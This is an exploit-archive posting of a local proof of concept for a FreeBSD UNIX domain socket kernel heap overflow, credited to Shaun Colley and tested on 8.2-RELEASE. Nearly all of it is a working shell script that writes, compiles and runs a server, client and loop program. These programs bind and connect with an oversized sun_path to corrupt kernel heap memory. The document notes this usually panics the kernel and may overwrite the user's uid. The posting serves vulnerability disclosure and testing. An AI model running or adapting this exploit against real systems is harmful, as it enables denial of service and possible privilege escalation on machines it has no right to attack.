
FreeBSD UIPC Socket Heap Overflow

FreeBSD UIPC Socket Heap Overflow
Posted Sep 30, 2011
Authored by Shaun Colley

Local proof-of-concept for the FreeBSD UNIX domain (UIPC) socket heap overflow: a server and client that call bind()/connect() with a deliberately oversized sun_path, which corrupts kernel heap memory and usually ends in a kernel panic. Tested on FreeBSD 8.2-RELEASE.

tags | exploit, overflow, kernel, proof of concept
systems | freebsd
SHA-256 | 392d5e1fab7ef40059a4391fcc8e1c05b6f410d6413606f432dc4a27dfea91ba

#!/bin/sh
#
# fbsd-uipcsock-heap.sh, by Shaun Colley <scolley@ioactive.com>, 29/09/11
#
# proof-of-concept crash for the freebsd unix domain sockets heap
# overflow. this was tested on freebsd 8.2-RELEASE. just a PoC for now.
#
# see advisory & patches for details:
# http://www.securityfocus.com/archive/1/519864/30/0/threaded
#
# this PoC will usually result in a kernel panic with a read access
# violation at 0x616161XX but sometimes the kernel will not crash straight
# away (particularly if you shorten the length of 'sun_path' -- try 140 bytes),
# and your uid (see output of `id`) may have been modified to the
# decimal equivalent of 0x61616161 during the heap smash

# write server code to srv.c
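# quote the delimiter: the C source below must reach the file verbatim, not
# go through shell parameter/command expansion (a stray $ or backtick in the
# C would otherwise be silently rewritten)
cat > srv.c << '_EOF'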
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/types.h>
#include <unistd.h>
#include <string.h>

/*
 * Stand-in for struct sockaddr_un with an oversized sun_path: 2 + 160 =
 * 162 bytes, passed with its full sizeof as the address length to bind()
 * and connect(). The platform's real sockaddr_un is smaller (104-byte
 * sun_path on FreeBSD), and that size difference is what drives the
 * kernel-side copy past its buffer. The script header says 140 bytes is
 * also enough to trigger it.
 *
 * NOTE(review): FreeBSD's sockaddr_un starts with a one-byte sun_len before
 * sun_family, so on a little-endian host this layout lands 0x01 in sun_len
 * and 0 in sun_family; the PoC evidently still works, presumably because the
 * kernel rewrites the length itself -- confirm before porting this layout.
 */
struct socky {
short sun_family;
char sun_path[160];
};

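/*
 * Handle one accepted connection: echo whatever the client sent to stdout,
 * send a fixed banner back, and close the descriptor.
 *
 * incoming: connected socket returned by accept(); always closed before
 *           returning.
 * Returns 0 on success, 1 if the read failed. It runs in the forked child,
 * so the return value becomes the child's exit status.
 */
int connhandler(int incoming)
{
	char buffer[256];
	ssize_t n;
	int len;

	/* read at most sizeof(buffer) - 1: a full 256-byte read followed by
	 * buffer[n] = 0 wrote one past the end of the array, and a failed
	 * read() (n == -1) wrote to buffer[-1] */
	n = read(incoming, buffer, sizeof(buffer) - 1);
	if(n < 0)
	{
		perror("read");
		close(incoming);
		return 1;
	}
	buffer[n] = 0;

	/* client data is untrusted: pass it as an argument, never as the format */
	printf("%s\n", buffer);

	len = snprintf(buffer, sizeof(buffer), "fbsd uipc socket heap overflow");
	if(write(incoming, buffer, len) < 0)
		perror("write");

	close(incoming);
	return 0;
}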

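/*
 * Bind a listening UNIX domain socket whose address carries a 159-byte
 * sun_path (far longer than the real sockaddr_un allows), then fork one
 * child per accepted connection. The oversized address is the trigger for
 * the kernel-side overflow; the rest is an ordinary forking server.
 *
 * Returns 0 when the accept loop ends, 1 if socket setup fails. In a forked
 * child it returns connhandler's result, which becomes the child's exit
 * status.
 */
int main(void)
{
	struct socky overfl0w;
	struct socky peer;
	int sock, incoming;
	socklen_t alen;
	pid_t child;
	char buf[160];

	sock = socket(PF_UNIX, SOCK_STREAM, 0);
	if(sock < 0)
	{
		printf("socket() failed!\n");
		return 1;
	}

	memset(&overfl0w, 0, sizeof(overfl0w));
	overfl0w.sun_family = AF_UNIX;

	/* sun_path = 159 x 0x61 ('a') plus NUL; these are the bytes that later
	 * show up in the faulting address (0x616161XX) or the smashed uid */
	memset(buf, 0x61, sizeof(buf));
	buf[sizeof(buf) - 1] = 0x00;
	strcpy(overfl0w.sun_path, buf);

	/* a previous run leaves the socket node behind and bind() would then
	 * fail with EADDRINUSE; best-effort removal, errors deliberately ignored */
	unlink(overfl0w.sun_path);

	if(bind(sock, (struct sockaddr *)&overfl0w, sizeof(overfl0w)) != 0)
	{
		printf("bind() failed!\n");
		return 1;
	}

	if(listen(sock, 5) != 0)
	{
		printf("listen() failed!\n");
		return 1;
	}

	for(;;)
	{
		/* accept() reads *alen as the size of the buffer it may fill, so it
		 * must be set before every call (it was left uninitialised before);
		 * the peer address goes to its own struct so the bound address is
		 * not overwritten */
		alen = sizeof(peer);
		incoming = accept(sock, (struct sockaddr *)&peer, &alen);
		if(incoming < 0)
			break;

		child = fork();
		if(child == 0)
		{
			close(sock);	/* the child only needs the connected socket */
			return connhandler(incoming);
		}
		if(child < 0)
			printf("fork() failed!\n");

		/* parent: the child owns the connection now. Children are not
		 * reaped here (no wait()), so finished ones linger as zombies
		 * until this process exits -- acceptable for a throwaway PoC. */
		close(incoming);
	}

	close(sock);
	return 0;
}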
_EOF

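# stop if the build fails; otherwise the script carries on and tries to run
# a binary that does not exist
gcc srv.c -o srv || exit 1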

# write the client code to client.c
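# quoted delimiter: no shell expansion inside the C source
cat > client.c << '_EOF'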
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
#include <string.h>

/*
 * Same oversized sockaddr_un look-alike as in srv.c: 2 + 160 = 162 bytes,
 * handed to connect() with its full sizeof as the address length. The
 * platform's real sockaddr_un is smaller (104-byte sun_path on FreeBSD);
 * the excess is what the vulnerable kernel copies past its buffer.
 */
struct socky {
short sun_family;
char sun_path[160];
};

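/*
 * Connect to the server's oversized UNIX domain socket address, send a
 * short message and print the reply. Every connect() with the 159-byte
 * sun_path is another chance for the kernel-side overflow to fire, which
 * is why loop.c runs this client repeatedly.
 *
 * Returns 0 after a successful exchange, 1 on any socket error.
 */
int main(void)
{
	struct socky overfl0w;
	int sock;
	ssize_t n;
	int len;
	char buffer[256], buf[160];

	sock = socket(PF_UNIX, SOCK_STREAM, 0);
	if(sock < 0)
	{
		printf("socket() failed!\n");
		return 1;
	}

	/* clear the whole oversized struct, matching srv.c; the previous
	 * memset used sizeof(struct sockaddr_un), which is smaller than
	 * struct socky */
	memset(&overfl0w, 0, sizeof(overfl0w));
	overfl0w.sun_family = AF_UNIX;

	/* 159 x 0x61 ('a') plus NUL, same pattern the server bound */
	memset(buf, 0x61, sizeof(buf));
	buf[sizeof(buf) - 1] = 0x00;
	strcpy(overfl0w.sun_path, buf);

	if(connect(sock, (struct sockaddr *)&overfl0w, sizeof(overfl0w)) != 0)
	{
		printf("connect() failed!\n");
		close(sock);
		return 1;
	}

	len = snprintf(buffer, sizeof(buffer), "panic");
	if(write(sock, buffer, len) < 0)
	{
		printf("write() failed!\n");
		close(sock);
		return 1;
	}

	/* leave room for the terminator and never index with a negative n:
	 * a failed read() returns -1 and the original then wrote buffer[-1] */
	n = read(sock, buffer, sizeof(buffer) - 1);
	if(n < 0)
	{
		printf("read() failed!\n");
		close(sock);
		return 1;
	}
	buffer[n] = 0;

	printf("%s\n", buffer);

	close(sock);
	return 0;
}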
_EOF

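# abort on build failure rather than looping over a missing ./client
gcc client.c -o client || exit 1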

# crash doesn't happen straight away, so loop the client to speed it up
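# quoted delimiter: no shell expansion inside the C source
cat > loop.c << '_EOF'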
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>

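/*
 * Run ./client repeatedly: the overflow does not fire on the first
 * connection, so the more connect() calls are made the sooner the kernel
 * is expected to fall over. Bails out early if the client cannot be
 * started at all, instead of spinning through 1000 failed launches.
 *
 * Returns 0 normally, 1 if ./client could not be run.
 */
int main(void)
{
	enum { ITERATIONS = 1000 };

	for(int i = 0; i < ITERATIONS; i++)
	{
		/* fixed command string, no untrusted input reaches the shell */
		int rc = system("./client");

		/* -1: system() could not spawn the shell; exit status 127: the
		 * shell could not execute ./client (e.g. it was never built) */
		if(rc == -1 || (WIFEXITED(rc) && WEXITSTATUS(rc) == 127))
		{
			fprintf(stderr, "could not run ./client\n");
			return 1;
		}
	}
	return 0;
}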
_EOF

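# abort on build failure
gcc loop.c -o loop || exit 1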

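# start the server in the background and give it a moment to bind() before
# the first client connects, otherwise the early iterations just fail with
# "connect() failed!" and are wasted
./srv &
srv_pid=$!
sleep 1
./loop
# only reached if the kernel survived all iterations: stop the server
kill "$srv_pid" 2>/dev/null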
